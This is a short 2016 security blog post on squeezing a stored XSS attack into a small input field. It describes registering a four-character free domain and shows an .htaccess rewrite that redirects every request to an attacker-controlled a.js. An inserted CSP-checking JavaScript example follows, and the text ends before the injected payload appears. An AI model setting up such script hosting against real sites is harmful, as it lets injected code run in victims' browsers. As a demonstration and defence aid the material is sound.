Tuesday, January 5, 2016

xss-script injection if size matters...

Wanted to demonstrate a stored XSS vulnerability with less space in the vulnerable field.
(In this case <script> tags were filtered, so I had to use jQuery.)

Registered a .cf domain (4-character domains are free) at http://www.freenom.com/

Set up an Apache and pointed whw3.cf to it.

Configured Apache to redirect / to my JavaScript file.
.htaccess rewrite:

Options +FollowSymLinks
RewriteEngine on
RewriteCond %{REQUEST_URI} !^/a.js
RewriteRule ^(.*)$ http://%{HTTP_HOST}/a.js [R=301,L]
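
The redirect above only pays off if the vulnerable page lets the browser fetch script from an arbitrary third-party host. As an added example (not code from the original post), the JavaScript below is a simplified check of whether a Content-Security-Policy header would allow a script URL such as http://whw3.cf/a.js. The function names and the app.example page URL are assumptions, and nonces, hashes, 'strict-dynamic', ports and paths are not modelled.

```javascript
// Added example: simplified CSP evaluation for externally hosted scripts.
// Not a full CSP implementation: nonces, hashes, 'strict-dynamic',
// ports and path matching are deliberately left out.
function parseCsp(header) {
  const policy = new Map();
  for (const part of header.split(';')) {
    const [name, ...values] = part.trim().split(/\s+/);
    // The first occurrence of a directive wins; later duplicates are ignored.
    if (name && !policy.has(name.toLowerCase())) {
      policy.set(name.toLowerCase(), values);
    }
  }
  return policy;
}

function hostMatches(pattern, host) {
  // "*.example.net" covers subdomains only, not example.net itself.
  if (pattern.startsWith('*.')) return host.endsWith(pattern.slice(1));
  return pattern === host;
}

function scriptAllowed(header, pageUrl, scriptUrl) {
  const policy = parseCsp(header);
  // script-src falls back to default-src when it is absent.
  const sources = policy.get('script-src') ?? policy.get('default-src');
  if (sources === undefined) return true; // nothing restricts script loads
  const page = new URL(pageUrl);
  const script = new URL(scriptUrl);
  return sources.some((src) => {
    const s = src.toLowerCase();
    if (s === "'self'") return script.origin === page.origin;
    if (s === '*') return ['http:', 'https:'].includes(script.protocol);
    if (s.startsWith("'")) return false; // 'none' and keywords not modelled
    if (/^[a-z][a-z0-9+.-]*:$/.test(s)) return s === script.protocol;
    const m = s.match(/^(?:([a-z][a-z0-9+.-]*):\/\/)?([^\/:]+)/);
    if (!m) return false;
    if (m[1] && m[1] + ':' !== script.protocol) return false;
    return hostMatches(m[2], script.hostname);
  });
}

// Constructed sample: a page on app.example with an allowlisting policy.
const SAMPLE_CSP = "default-src 'self'; script-src 'self' https://code.jquery.com";
const SAMPLE_PAGE = 'https://app.example/profile';
console.log(scriptAllowed(SAMPLE_CSP, SAMPLE_PAGE, 'http://whw3.cf/a.js'));
console.log(scriptAllowed("img-src 'self'", SAMPLE_PAGE, 'http://whw3.cf/a.js'));
```

A policy with no `script-src` or `default-src` places no limit on where script is loaded from, which is the situation the short external domain takes advantage of.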

Injected the following